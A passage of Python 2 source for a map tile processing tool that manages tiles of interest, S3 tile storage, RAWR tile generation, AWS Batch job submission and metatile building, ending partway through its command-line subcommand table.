reverse=True)[:cutoff_tiles]:
if count >= cutoff_requests:
new_toi.add(coord_int)
redshift_results = None
logger.info('Finding %s tiles requested %s+ times ... done. Found %s',
cutoff_tiles,
cutoff_requests,
len(new_toi),
)
for name, info in prune_cfg.get('always-include', {}).items():
logger.info('Adding in tiles from %s ...', name)
immortal_tiles = set()
if 'bbox' in info:
bounds = map(float, info['bbox'].split(','))
for coord in tile_generator_for_single_bounds(
bounds, info['min_zoom'], info['max_zoom']):
coord_int = coord_marshall_int(coord)
immortal_tiles.add(coord_int)
elif 'tiles' in info:
tiles = map(deserialize_coord, info['tiles'])
tiles = map(coord_marshall_int, tiles)
immortal_tiles.update(tiles)
elif 'file' in info:
with open(info['file'], 'r') as f:
immortal_tiles.update(
coord_marshall_int(deserialize_coord(line.strip()))
for line in f
)
elif 'bucket' in info:
from boto import connect_s3
from boto.s3.bucket import Bucket
s3_conn = connect_s3()
bucket = Bucket(s3_conn, info['bucket'])
key = bucket.get_key(info['key'])
raw_coord_data = key.get_contents_as_string()
for line in raw_coord_data.splitlines():
coord = deserialize_coord(line.strip())
if coord:
# NOTE: the tiles in the file should be of the
# same size as the toi
coord_int = coord_marshall_int(coord)
immortal_tiles.add(coord_int)
# Filter out nulls that might sneak in for various reasons
immortal_tiles = filter(None, immortal_tiles)
n_inc = len(immortal_tiles)
new_toi = new_toi.union(immortal_tiles)
# ensure that the new coordinates have valid zooms
new_toi_valid_range = set()
for coord_int in new_toi:
coord = coord_unmarshall_int(coord_int)
if coord_is_valid(coord, cfg.max_zoom):
new_toi_valid_range.add(coord_int)
new_toi = new_toi_valid_range
logger.info('Adding in tiles from %s ... done. %s found', name, n_inc)
logger.info('New tiles of interest set includes %s tiles', len(new_toi))
logger.info('Fetching existing tiles of interest ...')
tiles_of_interest = peripherals.toi.fetch_tiles_of_interest()
n_toi = len(tiles_of_interest)
logger.info('Fetching existing tiles of interest ... done. %s found',
n_toi)
logger.info('Computing tiles to remove ...')
toi_to_remove = tiles_of_interest - new_toi
logger.info('Computing tiles to remove ... done. %s found',
len(toi_to_remove))
peripherals.stats.gauge('gardener.removed', len(toi_to_remove))
store = _make_store(cfg)
if not toi_to_remove:
logger.info('Skipping TOI remove step because there are '
'no tiles to remove')
else:
logger.info('Removing %s tiles from TOI and S3 ...',
len(toi_to_remove))
for coord_ints in grouper(toi_to_remove, 1000):
removed = store.delete_tiles(
map(coord_unmarshall_int, coord_ints),
lookup_format_by_extension(
store_parts['format']), store_parts['layer'])
logger.info('Removed %s tiles from S3', removed)
logger.info('Removing %s tiles from TOI and S3 ... done',
len(toi_to_remove))
logger.info('Computing tiles to add ...')
toi_to_add = new_toi - tiles_of_interest
logger.info('Computing tiles to add ... done. %s found',
len(toi_to_add))
peripherals.stats.gauge('gardener.added', len(toi_to_add))
if not toi_to_add:
logger.info('Skipping TOI add step because there are '
'no tiles to add')
else:
logger.info('Enqueueing %s tiles ...', len(toi_to_add))
queue_writer = peripherals.queue_writer
n_queued, n_in_flight = queue_writer.enqueue_batch(
coord_unmarshall_int(coord_int) for coord_int in toi_to_add
)
logger.info('Enqueueing %s tiles ... done', len(toi_to_add))
if toi_to_add or toi_to_remove:
logger.info('Setting new tiles of interest ... ')
peripherals.toi.set_tiles_of_interest(new_toi)
emit_toi_stats(new_toi, peripherals)
logger.info('Setting new tiles of interest ... done')
else:
logger.info('Tiles of interest did not change, '
'so not setting new tiles of interest')
logger.info('Pruning tiles of interest ... done')
time_overall.stop()
def tilequeue_process_wof_neighbourhoods(cfg, peripherals):
from tilequeue.stats import RawrTileEnqueueStatsHandler
from tilequeue.wof import make_wof_model
from tilequeue.wof import make_wof_url_neighbourhood_fetcher
from tilequeue.wof import make_wof_processor
from tilequeue.rawr import make_rawr_enqueuer_from_cfg
wof_cfg = cfg.wof
assert wof_cfg, 'Missing wof config'
logger = make_logger(cfg, 'wof_process_neighbourhoods')
logger.info('WOF process neighbourhoods run started')
n_raw_neighbourhood_fetch_threads = 5
fetcher = make_wof_url_neighbourhood_fetcher(
wof_cfg['neighbourhoods-meta-url'],
wof_cfg['microhoods-meta-url'],
wof_cfg['macrohoods-meta-url'],
wof_cfg['boroughs-meta-url'],
wof_cfg['data-prefix-url'],
n_raw_neighbourhood_fetch_threads,
wof_cfg.get('max-retries', 0)
)
model = make_wof_model(wof_cfg['postgresql'])
current_date = datetime.date.today()
stats = make_statsd_client_from_cfg(cfg)
stats_handler = RawrTileEnqueueStatsHandler(stats)
rawr_enqueuer = make_rawr_enqueuer_from_cfg(
cfg, logger, stats_handler, peripherals.msg_marshaller)
processor = make_wof_processor(
fetcher, model, peripherals.toi, rawr_enqueuer, logger, current_date)
logger.info('Processing ...')
processor()
logger.info('Processing ... done')
logger.info('WOF process neighbourhoods run completed')
def tilequeue_initial_load_wof_neighbourhoods(cfg, peripherals):
from tilequeue.wof import make_wof_initial_loader
from tilequeue.wof import make_wof_model
from tilequeue.wof import make_wof_filesystem_neighbourhood_fetcher
wof_cfg = cfg.wof
assert wof_cfg, 'Missing wof config'
logger = make_logger(cfg, 'wof_process_neighbourhoods')
logger.info('WOF initial neighbourhoods load run started')
n_raw_neighbourhood_fetch_threads = 50
fetcher = make_wof_filesystem_neighbourhood_fetcher(
wof_cfg['data-path'],
n_raw_neighbourhood_fetch_threads,
)
model = make_wof_model(wof_cfg['postgresql'])
loader = make_wof_initial_loader(fetcher, model, logger)
logger.info('Loading ...')
loader()
logger.info('Loading ... done')
def tilequeue_dump_tiles_of_interest(cfg, peripherals):
logger = make_logger(cfg, 'dump_tiles_of_interest')
logger.info('Dumping tiles of interest')
logger.info('Fetching tiles of interest ...')
toi_set = peripherals.toi.fetch_tiles_of_interest()
n_toi = len(toi_set)
logger.info('Fetching tiles of interest ... done')
toi_filename = "toi.txt"
logger.info('Writing %d tiles of interest to %s ...', n_toi, toi_filename)
with open(toi_filename, "w") as f:
save_set_to_fp(toi_set, f)
logger.info(
'Writing %d tiles of interest to %s ... done',
n_toi,
toi_filename
)
def tilequeue_load_tiles_of_interest(cfg, peripherals):
"""
Given a newline-delimited file containing tile coordinates in
`zoom/column/row` format, load those tiles into the tiles of interest.
"""
logger = make_logger(cfg, 'load_tiles_of_interest')
toi_filename = "toi.txt"
logger.info('Loading tiles of interest from %s ... ', toi_filename)
with open(toi_filename, 'r') as f:
new_toi = load_set_from_fp(f)
logger.info('Loading tiles of interest from %s ... done', toi_filename)
logger.info('Setting new TOI (with %s tiles) ... ', len(new_toi))
peripherals.toi.set_tiles_of_interest(new_toi)
emit_toi_stats(new_toi, peripherals)
logger.info('Setting new TOI (with %s tiles) ... done', len(new_toi))
logger.info('Loading tiles of interest ... done')
def tilequeue_stuck_tiles(cfg, peripherals):
"""
Check which files exist on s3 but are not in toi.
"""
store = _make_store(cfg)
format = lookup_format_by_extension('zip')
layer = 'all'
assert peripherals.toi, 'Missing toi'
toi = peripherals.toi.fetch_tiles_of_interest()
for coord in store.list_tiles(format, layer):
coord_int = coord_marshall_int(coord)
if coord_int not in toi:
print serialize_coord(coord)
def tilequeue_delete_stuck_tiles(cfg, peripherals):
logger = make_logger(cfg, 'delete_stuck_tiles')
format = lookup_format_by_extension('zip')
layer = 'all'
store = _make_store(cfg)
logger.info('Removing tiles from S3 ...')
total_removed = 0
for coord_strs in grouper(sys.stdin, 1000):
coords = []
for coord_str in coord_strs:
coord = deserialize_coord(coord_str)
if coord:
coords.append(coord)
if coords:
n_removed = store.delete_tiles(coords, format, layer)
total_removed += n_removed
logger.info('Removed %s tiles from S3', n_removed)
logger.info('Total removed: %d', total_removed)
logger.info('Removing tiles from S3 ... DONE')
def tilequeue_tile_status(cfg, peripherals, args):
"""
Report the status of the given tiles in the store, queue and TOI.
"""
logger = make_logger(cfg, 'tile_status')
# friendly warning to avoid confusion when this command outputs nothing
# at all when called with no positional arguments.
if not args.coords:
logger.warning('No coordinates given on the command line.')
return
# pre-load TOI to avoid having to do it for each coordinate
toi = None
if peripherals.toi:
toi = peripherals.toi.fetch_tiles_of_interest()
# TODO: make these configurable!
tile_format = lookup_format_by_extension('zip')
store = _make_store(cfg)
for coord_str in args.coords:
coord = deserialize_coord(coord_str)
# input checking! make sure that the coordinate is okay to use in
# the rest of the code.
if not coord:
logger.warning('Could not deserialize %r as coordinate', coord_str)
continue
if not coord_is_valid(coord):
logger.warning('Coordinate is not valid: %r (parsed from %r)',
coord, coord_str)
continue
# now we think we probably have a valid coordinate. go look up
# whether it exists in various places.
logger.info("=== %s ===", coord_str)
coord_int = coord_marshall_int(coord)
if peripherals.inflight_mgr:
is_inflight = peripherals.inflight_mgr.is_inflight(coord)
logger.info('inflight: %r', is_inflight)
if toi:
in_toi = coord_int in toi
logger.info('in TOI: %r' % (in_toi,))
data = store.read_tile(coord, tile_format)
logger.info('tile in store: %r', bool(data))
class TileArgumentParser(argparse.ArgumentParser):
def error(self, message):
sys.stderr.write('error: %s\n' % message)
self.print_help()
sys.exit(2)
class FakeStatsd(object):
def __init__(self, *args, **kwargs):
pass
def incr(self, *args, **kwargs):
pass
def decr(self, *args, **kwargs):
pass
def gauge(self, *args, **kwargs):
pass
def set(self, *args, **kwargs):
pass
def timing(self, *args, **kwargs):
pass
def timer(self, *args, **kwargs):
return FakeStatsTimer()
def pipeline(self):
return self
def __enter__(self):
return self
def __exit__(self, type, value, traceback):
pass
class FakeStatsTimer(object):
def __init__(self, *args, **kwargs):
pass
def start(self):
pass
def stop(self):
pass
def tilequeue_process_tile(cfg, peripherals, args):
if not args.coord:
print >> sys.stderr, 'Missing coord argument'
sys.exit(1)
coord_str = args.coord
coord = deserialize_coord(coord_str)
if not coord:
print >> sys.stderr, 'Invalid coordinate: %s' % coord_str
sys.exit(2)
with open(cfg.query_cfg) as query_cfg_fp:
query_cfg = yaml.load(query_cfg_fp)
all_layer_data, layer_data, post_process_data = (
parse_layer_data(
query_cfg, cfg.buffer_cfg, os.path.dirname(cfg.query_cfg)))
output_calc_mapping = make_output_calc_mapping(cfg.process_yaml_cfg)
formats = lookup_formats(cfg.output_formats)
io_pool = ThreadPool(len(layer_data))
data_fetcher = make_data_fetcher(cfg, layer_data, query_cfg, io_pool)
for fetch, _ in data_fetcher.fetch_tiles([dict(coord=coord)]):
formatted_tiles, extra_data = process(
coord, cfg.metatile_zoom, fetch, layer_data, post_process_data,
formats, cfg.buffer_cfg, output_calc_mapping, cfg.max_zoom,
cfg.tile_sizes)
# can think about making this configurable
# but this is intended for debugging anyway
json_tile = [x for x in formatted_tiles
if x['format'].extension == 'json']
assert json_tile
json_tile = json_tile[0]
tile_data = json_tile['tile']
print tile_data
def tilequeue_rawr_enqueue(cfg, args):
"""command to take tile expiry path and enqueue for rawr tile generation"""
from tilequeue.stats import RawrTileEnqueueStatsHandler
from tilequeue.rawr import make_rawr_enqueuer_from_cfg
msg_marshall_yaml = cfg.yml.get('message-marshall')
assert msg_marshall_yaml, 'Missing message-marshall config'
msg_marshaller = make_message_marshaller(msg_marshall_yaml)
logger = make_logger(cfg, 'rawr_enqueue')
stats = make_statsd_client_from_cfg(cfg)
stats_handler = RawrTileEnqueueStatsHandler(stats)
rawr_enqueuer = make_rawr_enqueuer_from_cfg(
cfg, logger, stats_handler, msg_marshaller)
with open(args.expiry_path) as fh:
coords = create_coords_generator_from_tiles_file(fh)
rawr_enqueuer(coords)
def _tilequeue_rawr_setup(cfg,
s3_role_arn=None,
s3_role_session_duration_s=None):
"""command to read from rawr queue and generate rawr tiles
if `s3_role_arn` is non-empty then it will be used as the IAM role
to access the S3 and `s3_role_session_duration_s` determines the S3
session duration in seconds
"""
rawr_yaml = cfg.yml.get('rawr')
assert rawr_yaml is not None, 'Missing rawr configuration in yaml'
rawr_postgresql_yaml = rawr_yaml.get('postgresql')
assert rawr_postgresql_yaml, 'Missing rawr postgresql config'
from raw_tiles.formatter.msgpack import Msgpack
from raw_tiles.gen import RawrGenerator
from raw_tiles.source.conn import ConnectionContextManager
from raw_tiles.source import parse_sources
from raw_tiles.source import DEFAULT_SOURCES as DEFAULT_RAWR_SOURCES
from tilequeue.rawr import RawrS3Sink
from tilequeue.rawr import RawrStoreSink
import boto3
# pass through the postgresql yaml config directly
conn_ctx = ConnectionContextManager(rawr_postgresql_yaml)
rawr_source_list = rawr_yaml.get('sources', DEFAULT_RAWR_SOURCES)
assert isinstance(rawr_source_list, list), \
'RAWR source list should be a list'
assert len(rawr_source_list) > 0, \
'RAWR source list should be non-empty'
rawr_store = rawr_yaml.get('store')
if rawr_store:
store = \
make_store(rawr_store,
s3_role_arn=s3_role_arn,
s3_role_session_duration_s=s3_role_session_duration_s)
rawr_sink = RawrStoreSink(store)
else:
rawr_sink_yaml = rawr_yaml.get('sink')
assert rawr_sink_yaml, 'Missing rawr sink config'
sink_type = rawr_sink_yaml.get('type')
assert sink_type, 'Missing rawr sink type'
if sink_type == 's3':
s3_cfg = rawr_sink_yaml.get('s3')
assert s3_cfg, 'Missing s3 config'
bucket = s3_cfg.get('bucket')
assert bucket, 'Missing rawr sink bucket'
sink_region = s3_cfg.get('region')
assert sink_region, 'Missing rawr sink region'
prefix = s3_cfg.get('prefix')
assert prefix, 'Missing rawr sink prefix'
extension = s3_cfg.get('extension')
assert extension, 'Missing rawr sink extension'
tags = s3_cfg.get('tags')
from tilequeue.store import make_s3_tile_key_generator
tile_key_gen = make_s3_tile_key_generator(s3_cfg)
if s3_role_arn:
# use provided role to access S3
assert s3_role_session_duration_s, \
's3_role_session_duration_s is either None or 0'
aws_helper = AwsSessionHelper('tilequeue_dataaccess',
s3_role_arn,
sink_region,
s3_role_session_duration_s)
s3_client = aws_helper.get_client('s3')
else:
s3_client = boto3.client('s3', region_name=sink_region)
rawr_sink = RawrS3Sink(
s3_client, bucket, prefix, extension, tile_key_gen, tags)
elif sink_type == 'none':
from tilequeue.rawr import RawrNullSink
rawr_sink = RawrNullSink()
else:
assert 0, 'Unknown rawr sink type %s' % sink_type
rawr_source = parse_sources(rawr_source_list)
rawr_formatter = Msgpack()
rawr_gen = RawrGenerator(rawr_source, rawr_formatter, rawr_sink)
return rawr_gen, conn_ctx
# run RAWR tile processing in a loop, reading from queue
def tilequeue_rawr_process(cfg, peripherals):
from tilequeue.rawr import RawrTileGenerationPipeline
from tilequeue.log import JsonRawrProcessingLogger
from tilequeue.stats import RawrTilePipelineStatsHandler
from tilequeue.rawr import make_rawr_queue_from_yaml
rawr_yaml = cfg.yml.get('rawr')
assert rawr_yaml is not None, 'Missing rawr configuration in yaml'
group_by_zoom = rawr_yaml.get('group-zoom')
assert group_by_zoom is not None, 'Missing group-zoom rawr config'
msg_marshall_yaml = cfg.yml.get('message-marshall')
assert msg_marshall_yaml, 'Missing message-marshall config'
msg_marshaller = make_message_marshaller(msg_marshall_yaml)
rawr_queue_yaml = rawr_yaml.get('queue')
assert rawr_queue_yaml, 'Missing rawr queue config'
rawr_queue = make_rawr_queue_from_yaml(rawr_queue_yaml, msg_marshaller)
logger = make_logger(cfg, 'rawr_process')
stats_handler = RawrTilePipelineStatsHandler(peripherals.stats)
rawr_proc_logger = JsonRawrProcessingLogger(logger)
rawr_gen, conn_ctx = _tilequeue_rawr_setup(cfg)
rawr_pipeline = RawrTileGenerationPipeline(
rawr_queue, msg_marshaller, group_by_zoom, rawr_gen,
peripherals.queue_writer, stats_handler,
rawr_proc_logger, conn_ctx)
rawr_pipeline()
def make_default_run_id(include_clock_time, now=None):
if now is None:
now = datetime.datetime.now()
if include_clock_time:
fmt = '%Y%m%d-%H:%M:%S'
else:
fmt = '%Y%m%d'
return now.strftime(fmt)
# run a single RAWR tile generation
def tilequeue_rawr_tile(cfg, args):
from raw_tiles.source.table_reader import TableReader
from tilequeue.log import JsonRawrTileLogger
from tilequeue.rawr import convert_coord_object
parent_coord_str = args.tile
parent = deserialize_coord(parent_coord_str)
assert parent, 'Invalid tile coordinate: %s' % parent_coord_str
run_id = args.run_id
if not run_id:
run_id = make_default_run_id(include_clock_time=False)
rawr_yaml = cfg.yml.get('rawr')
assert rawr_yaml is not None, 'Missing rawr configuration in yaml'
group_by_zoom = rawr_yaml.get('group-zoom')
assert group_by_zoom is not None, 'Missing group-zoom rawr config'
rawr_gen, conn_ctx = \
_tilequeue_rawr_setup(cfg,
s3_role_arn=args.s3_role_arn,
s3_role_session_duration_s=args.
s3_role_session_duration_s)
logger = make_logger(cfg, 'rawr_tile')
rawr_tile_logger = JsonRawrTileLogger(logger, run_id)
rawr_tile_logger.lifecycle(parent, 'Rawr tile generation started')
parent_timing = {}
with time_block(parent_timing, 'total'):
job_coords = find_job_coords_for(parent, group_by_zoom)
for coord in job_coords:
try:
coord_timing = {}
with time_block(coord_timing, 'total'):
rawr_tile_coord = convert_coord_object(coord)
with conn_ctx() as conn:
# commit transaction
with conn as conn:
# cleanup cursor resources
with conn.cursor() as cur:
table_reader = TableReader(cur)
rawr_gen_timing = rawr_gen(
table_reader, rawr_tile_coord)
coord_timing['gen'] = rawr_gen_timing
rawr_tile_logger.coord_done(parent, coord, coord_timing)
except Exception as e:
rawr_tile_logger.error(e, parent, coord)
rawr_tile_logger.parent_coord_done(parent, parent_timing)
rawr_tile_logger.lifecycle(parent, 'Rawr tile generation finished')
def _tilequeue_rawr_seed(cfg, peripherals, coords):
from tilequeue.rawr import make_rawr_enqueuer_from_cfg
from tilequeue.rawr import RawrAllIntersector
from tilequeue.stats import RawrTileEnqueueStatsHandler
logger = make_logger(cfg, 'rawr_seed')
stats_handler = RawrTileEnqueueStatsHandler(peripherals.stats)
rawr_toi_intersector = RawrAllIntersector()
rawr_enqueuer = make_rawr_enqueuer_from_cfg(
cfg, logger, stats_handler, peripherals.msg_marshaller,
rawr_toi_intersector)
rawr_enqueuer(coords)
logger.info('%d coords enqueued', len(coords))
def tilequeue_rawr_seed_toi(cfg, peripherals):
"""command to read the toi and enqueue the corresponding rawr tiles"""
tiles_of_interest = peripherals.toi.fetch_tiles_of_interest()
coords = map(coord_unmarshall_int, tiles_of_interest)
_tilequeue_rawr_seed(cfg, peripherals, coords)
def tilequeue_rawr_seed_all(cfg, peripherals):
"""command to enqueue all the tiles at the group-by zoom"""
rawr_yaml = cfg.yml.get('rawr')
assert rawr_yaml is not None, 'Missing rawr configuration in yaml'
group_by_zoom = rawr_yaml.get('group-zoom')
assert group_by_zoom is not None, 'Missing group-zoom rawr config'
max_coord = 2 ** group_by_zoom
# creating the list of all coordinates here might be a lot of memory, but
# if we handle the TOI okay then we should be okay with z10. if the group
# by zoom is much larger, then it might start running into problems.
coords = []
for x in xrange(0, max_coord):
for y in xrange(0, max_coord):
coords.append(Coordinate(zoom=group_by_zoom, column=x, row=y))
_tilequeue_rawr_seed(cfg, peripherals, coords)
Peripherals = namedtuple(
'Peripherals',
'toi stats redis_client '
'queue_mapper msg_marshaller inflight_mgr queue_writer'
)
def make_statsd_client_from_cfg(cfg):
if cfg.statsd_host:
import statsd
stats = statsd.StatsClient(cfg.statsd_host, cfg.statsd_port,
prefix=cfg.statsd_prefix)
else:
stats = FakeStatsd()
return stats
def tilequeue_batch_enqueue(cfg, args):
logger = make_logger(cfg, 'batch_enqueue')
import boto3
region_name = os.environ.get('AWS_DEFAULT_REGION', 'us-east-1')
client = boto3.client('batch', region_name=region_name)
logger.info('Batch enqueue ...')
batch_yaml = cfg.yml.get('batch')
assert batch_yaml, 'Missing batch config'
queue_zoom = batch_yaml.get('queue-zoom')
assert queue_zoom, 'Missing batch queue-zoom config'
job_def = batch_yaml.get('job-definition')
assert job_def, 'Missing batch job-definition config'
job_queue = batch_yaml.get('job-queue')
assert job_queue, 'Missing batch job-queue config'
job_name_prefix = batch_yaml.get('job-name-prefix')
assert job_name_prefix, 'Missing batch job-name-prefix config'
check_metatile_exists = batch_yaml.get('check-metatile-exists')
retry_attempts = batch_yaml.get('retry-attempts')
memory = batch_yaml.get('memory')
vcpus = batch_yaml.get('vcpus')
run_id = batch_yaml.get('run_id')
if not run_id:
run_id = make_default_run_id(include_clock_time=True)
if args.file:
with open(args.file) as coords_fh:
coords = list(create_coords_generator_from_tiles_file(coords_fh))
elif args.tile:
coord = deserialize_coord(args.tile)
assert coord, 'Invalid coord: %s' % args.tile
coords = [coord]
elif args.pyramid:
coords = tile_generator_for_range(0, 0, 0, 0, 0, 7)
else:
dim = 2 ** queue_zoom
coords = tile_generator_for_range(
0, 0, dim-1, dim-1, queue_zoom, queue_zoom)
for i, coord in enumerate(coords):
coord_str = serialize_coord(coord)
job_name = '%s-%d-%d-%d' % (
job_name_prefix, coord.zoom, coord.column, coord.row)
job_parameters = dict(
tile=coord_str,
run_id=run_id,
)
job_opts = dict(
jobDefinition=job_def,
jobQueue=job_queue,
jobName=job_name,
parameters=job_parameters,
)
if retry_attempts is not None:
job_opts['retryStrategy'] = dict(attempts=retry_attempts)
container_overrides = {}
if check_metatile_exists is not None:
val_str = str(bool(check_metatile_exists))
container_overrides['environment'] = dict(
name='TILEQUEUE__BATCH__CHECK-METATILE-EXISTS',
value=val_str
),
if memory:
container_overrides['memory'] = memory
if vcpus:
container_overrides['vcpus'] = vcpus
if container_overrides:
job_opts['containerOverrides'] = container_overrides
resp = client.submit_job(**job_opts)
assert resp['ResponseMetadata']['HTTPStatusCode'] == 200, \
'Failed to submit job: %s' % 'JobName'
i += 1
if i % 1000 == 0:
logger.info('%d jobs submitted', i)
logger.info('Batch enqueue ... done - %d coords enqueued', i)
def find_job_coords_for(coord, target_zoom):
assert target_zoom >= coord.zoom
if coord.zoom == target_zoom:
yield coord
return
xmin = coord.column
xmax = coord.column
ymin = coord.row
ymax = coord.row
for i in xrange(target_zoom - coord.zoom):
xmin *= 2
ymin *= 2
xmax = xmax * 2 + 1
ymax = ymax * 2 + 1
for y in xrange(ymin, ymax+1):
for x in xrange(xmin, xmax+1):
yield Coordinate(zoom=10, column=x, row=y)
def tilequeue_meta_tile(cfg, args):
from tilequeue.log import JsonMetaTileLogger
from tilequeue.metatile import make_metatiles
coord_str = args.tile
run_id = args.run_id
if not run_id:
run_id = make_default_run_id(include_clock_time=False)
logger = make_logger(cfg, 'meta_tile')
meta_tile_logger = JsonMetaTileLogger(logger, run_id)
store = \
_make_store(cfg,
s3_role_arn=args.s3_role_arn,
s3_role_session_duration_s=args.s3_role_session_duration_s,
logger=logger)
batch_yaml = cfg.yml.get('batch')
assert batch_yaml, 'Missing batch config'
queue_zoom = batch_yaml.get('queue-zoom')
assert queue_zoom, 'Missing batch queue-zoom config'
check_metatile_exists = bool(batch_yaml.get('check-metatile-exists'))
parent = deserialize_coord(coord_str)
assert parent, 'Invalid coordinate: %s' % coord_str
with open(cfg.query_cfg) as query_cfg_fp:
query_cfg = yaml.load(query_cfg_fp)
all_layer_data, layer_data, post_process_data = (
parse_layer_data(
query_cfg, cfg.buffer_cfg, os.path.dirname(cfg.query_cfg)))
output_calc_mapping = make_output_calc_mapping(cfg.process_yaml_cfg)
io_pool = ThreadPool(len(layer_data))
data_fetcher = make_data_fetcher(cfg,
layer_data,
query_cfg,
io_pool,
args.s3_role_arn,
args.s3_role_session_duration_s)
rawr_yaml = cfg.yml.get('rawr')
assert rawr_yaml is not None, 'Missing rawr configuration in yaml'
group_by_zoom = rawr_yaml.get('group-zoom')
assert group_by_zoom is not None, 'Missing group-zoom rawr config'
assert queue_zoom <= parent.zoom <= group_by_zoom, \
'Unexpected zoom: %s, zoom should be between %d and %d' % \
(coord_str, queue_zoom, group_by_zoom)
# NOTE: max_zoom looks to be inclusive
zoom_stop = cfg.max_zoom
assert zoom_stop > group_by_zoom
formats = lookup_formats(cfg.output_formats)
meta_tile_logger.begin_run(parent)
zip_format = lookup_format_by_extension('zip')
assert zip_format
job_coords = find_job_coords_for(parent, group_by_zoom)
for job_coord in job_coords:
meta_tile_logger.begin_pyramid(parent, job_coord)
# each coord here is the unit of work now
pyramid_coords = [job_coord]
pyramid_coords.extend(coord_children_range(job_coord, zoom_stop))
coord_data = [dict(coord=x) for x in pyramid_coords]
try:
fetched_coord_data = list(data_fetcher.fetch_tiles(coord_data))
except Exception as e:
meta_tile_logger.pyramid_fetch_failed(e, parent, job_coord)
continue
for fetch, coord_datum in fetched_coord_data:
coord_start_ms = int(time.time() * 1000)
coord = coord_datum['coord']
if check_metatile_exists:
existing_data = store.read_tile(coord, zip_format)
if existing_data is not None:
meta_tile_logger.metatile_already_exists(
parent, job_coord, coord)
continue
def log_fn(data):
meta_tile_logger._log(
data, parent, pyramid=job_coord, coord=coord)
processor = Processor(
coord, cfg.metatile_zoom, fetch, layer_data,
post_process_data, formats, cfg.buffer_cfg,
output_calc_mapping, cfg.max_zoom, cfg.tile_sizes,
log_fn=log_fn)
try:
processor.fetch()
except Exception as e:
meta_tile_logger.tile_fetch_failed(
e, parent, job_coord, coord)
continue
try:
formatted_tiles, _ = processor.process_tiles()
except Exception as e:
meta_tile_logger.tile_process_failed(
e, parent, job_coord, coord)
continue
try:
tiles = make_metatiles(cfg.metatile_size, formatted_tiles)
for tile in tiles:
store.write_tile(
tile['tile'], tile['coord'], tile['format'])
except Exception as e:
meta_tile_logger.metatile_storage_failed(
e, parent, job_coord, coord)
continue
meta_tile_logger.tile_processed(parent, job_coord,
coord, coord_start_ms)
meta_tile_logger.end_pyramid(parent, job_coord)
meta_tile_logger.end_run(parent)
def tilequeue_meta_tile_low_zoom(cfg, args):
from tilequeue.log import JsonMetaTileLowZoomLogger
from tilequeue.metatile import make_metatiles
coord_str = args.tile
parent = deserialize_coord(coord_str)
assert parent, 'Invalid tile coordinate: %s' % coord_str
run_id = args.run_id
if not run_id:
run_id = make_default_run_id(include_clock_time=False)
logger = make_logger(cfg, 'meta_tile_low_zoom')
meta_low_zoom_logger = JsonMetaTileLowZoomLogger(logger, run_id)
store = _make_store(cfg,
s3_role_arn=args.s3_role_arn,
s3_role_session_duration_s=args.s3_role_session_duration_s, # noqa
logger=logger)
batch_yaml = cfg.yml.get('batch')
assert batch_yaml, 'Missing batch config'
# NOTE: the queue zoom is the zoom at which jobs will mean that
# children should be processed as well
# before then, we will only generate meta tiles for individual tiles
queue_zoom = batch_yaml.get('queue-zoom')
assert queue_zoom, 'Missing batch queue-zoom config'
assert 0 <= parent.zoom <= queue_zoom
check_metatile_exists = bool(batch_yaml.get('check-metatile-exists'))
with open(cfg.query_cfg) as query_cfg_fp:
query_cfg = yaml.load(query_cfg_fp)
all_layer_data, layer_data, post_process_data = (
parse_layer_data(
query_cfg, cfg.buffer_cfg, os.path.dirname(cfg.query_cfg)))
output_calc_mapping = make_output_calc_mapping(cfg.process_yaml_cfg)
io_pool = ThreadPool(len(layer_data))
data_fetcher = make_data_fetcher(cfg, layer_data, query_cfg, io_pool)
rawr_yaml = cfg.yml.get('rawr')
assert rawr_yaml is not None, 'Missing rawr configuration in yaml'
# group by zoom is the exclusive stop for tiles if the command
# line coordinate is queue zoom
group_by_zoom = rawr_yaml.get('group-zoom')
assert group_by_zoom is not None, 'Missing group-zoom rawr config'
assert queue_zoom < group_by_zoom
formats = lookup_formats(cfg.output_formats)
zip_format = lookup_format_by_extension('zip')
assert zip_format
meta_low_zoom_logger.begin_run(parent)
coords = [parent]
# we don't include tiles at group_by_zoom, so unless parent.zoom is
# _more_ than one zoom level less, we don't need to include the pyramid.
if parent.zoom == queue_zoom and parent.zoom < group_by_zoom - 1:
# we will be multiple meta tile coordinates in this run
coords.extend(coord_children_range(parent, group_by_zoom - 1))
for coord in coords:
coord_start_ms = int(time.time() * 1000)
meta_low_zoom_logger._log("start processing coord",
parent=parent,
coord=coord)
if check_metatile_exists:
existing_data = store.read_tile(coord, zip_format)
if existing_data is not None:
meta_low_zoom_logger.metatile_already_exists(parent, coord)
continue
coord_data = [dict(coord=coord)]
try:
fetched_coord_data = list(data_fetcher.fetch_tiles(coord_data))
except Exception as e:
# the postgres db fetch doesn't perform the fetch at
# this step, which would make failures here very
# surprising
meta_low_zoom_logger.fetch_failed(e, parent, coord)
continue
assert len(fetched_coord_data) == 1
fetch, coord_datum = fetched_coord_data[0]
coord = coord_datum['coord']
def log_fn(data):
meta_low_zoom_logger._log(data, parent, coord)
processor = Processor(
coord, cfg.metatile_zoom, fetch, layer_data,
post_process_data, formats, cfg.buffer_cfg,
output_calc_mapping, cfg.max_zoom, cfg.tile_sizes,
log_fn=log_fn)
try:
processor.fetch()
except Exception as e:
meta_low_zoom_logger.fetch_failed(
e, parent, coord)
continue
try:
formatted_tiles, _ = processor.process_tiles()
except Exception as e:
meta_low_zoom_logger.tile_process_failed(
e, parent, coord)
continue
try:
tiles = make_metatiles(cfg.metatile_size, formatted_tiles)
meta_low_zoom_logger._log('start writing {n} tiles for coord'.format(n=len(tiles)), parent=parent, coord=coord) # noqa
for tile in tiles:
store.write_tile(tile['tile'], tile['coord'], tile['format'])
except Exception as e:
meta_low_zoom_logger.metatile_storage_failed(
e, parent, coord)
continue
meta_low_zoom_logger.tile_processed(parent, coord, coord_start_ms)
meta_low_zoom_logger.end_run(parent)
def tilequeue_main(argv_args=None):
if argv_args is None:
argv_args = sys.argv[1:]
parser = TileArgumentParser()
subparsers = parser.add_subparsers()
# these are all the "standard" parsers which just take a config argument
# that is already included at the top level.
cfg_commands = (
('process', tilequeue_process),
('seed', tilequeue_seed),
('dump-tiles-of-interest', tilequeue_dump_tiles_of_interest),
('load-tiles-of-interest', tilequeue_load_tiles_of_interest),
('enqueue-tiles-of-interest', tilequeue_enqueue_tiles_of_interest),
('enqueue-stdin', tilequeue_enqueue_stdin),
('prune-tiles-of-interest', tilequeue_prune_tiles_of_interest),
('wof-process-neighbourhoods', tilequeue_process_wof_neighbourhoods),
('wof-load-initial-neighbourhoods',
tilequeue_initial_load_wof_neighbourhoods),
('consume-tile-traffic', tilequeue_consume_tile_traffic),
